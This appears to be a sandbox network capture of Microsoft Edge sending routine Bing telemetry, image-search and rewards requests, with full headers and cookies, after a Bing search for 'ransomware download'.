useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-P6d3HwaBVCQNSlfTV+faKnB4m6M4JuDAdysoQLwEUXI='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:32:32 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220752.b327050
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2219%22}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2219%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 94BCFDFE6DDA476AB2CBE8D1AA0B03FA Ref B: LTSEDGE1612 Ref C: 2024-02-29T15:32:32Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:32 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220752.b32709b
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: D9BF2445B3FB44E0B7BC6301FD1F7A53 Ref B: LTSEDGE0821 Ref C: 2024-02-29T15:32:32Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:32 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220752.b32709a
-
GEThttps://www.bing.com/images/sbi?mmasync=1&ig=92027AEB1C3C42769F3D4EA5938FBAC6&iid=.5100&ptn=Web&ep=0&iconpl=1msedge.exeRemote address:92.123.128.152:443RequestGET /images/sbi?mmasync=1&ig=92027AEB1C3C42769F3D4EA5938FBAC6&iid=.5100&ptn=Web&ep=0&iconpl=1 HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: C10C2AB5730545FA8FCE2845B27508AE Ref B: LON04EDGE0710 Ref C: 2024-02-29T15:32:32Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:32 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220752.b327098
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.BNPUxAssetIndex%22%2C%22TS%22%3A1709220749231%2C%22Name%22%3A0%2C%22FID%22%3A%22BNP%22%7D%2C%7B%22Time%22%3A678%2C%22time%22%3A694%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1709220749671%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.BNPUxAssetIndex%22%2C%22TS%22%3A1709220749231%2C%22Name%22%3A0%2C%22FID%22%3A%22BNP%22%7D%2C%7B%22Time%22%3A678%2C%22time%22%3A694%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1709220749671%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
content-type: text/html; charset=utf-8
cache-control: no-cache, no-store, must-revalidate
content-encoding: br
expires: -1
pragma: no-cache
vary: Accept-Encoding
x-eventid: 65e0a39055bd4701a28192a9c3b132fc
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-4cdEZ9gY9oZN7Q8m7PStShxC+zrBVqcJbm22KiVGHQI='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:32:32 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220752.b327172
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A695%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1709220749672%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A695%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1709220749672%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
content-type: text/html; charset=utf-8
cache-control: no-cache
content-encoding: br
expires: -1
pragma: no-cache
vary: Accept-Encoding
x-eventid: 65e0a39070e5420c9dc3878260c50857
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-D6AU1rbUKMJjmZ0WUX4+Z2DSBjjCtHWG7q0Zkvz3WUw='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:32:32 GMT
set-cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=; domain=.bing.com; expires=Fri, 28-Feb-2025 15:32:32 GMT; path=/; secure; SameSite=None
set-cookie: _Rwho=u=d; domain=.bing.com; path=/; secure; HttpOnly; SameSite=None
set-cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220752.b3271b9
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A695%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1709220749672%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A695%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1709220749672%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 033EE0504B9B43EC8A783142DCDA5674 Ref B: LTSEDGE2018 Ref C: 2024-02-29T15:32:32Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:32 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220752.b3272d8
-
POSThttps://www.bing.com/rewardsapp/ncheader?ver=43901714&IID=SERP.5057&IG=92027AEB1C3C42769F3D4EA5938FBAC6msedge.exeRemote address:92.123.128.152:443RequestPOST /rewardsapp/ncheader?ver=43901714&IID=SERP.5057&IG=92027AEB1C3C42769F3D4EA5938FBAC6 HTTP/2.0
host: www.bing.com
content-length: 4
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: application/x-www-form-urlencoded
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
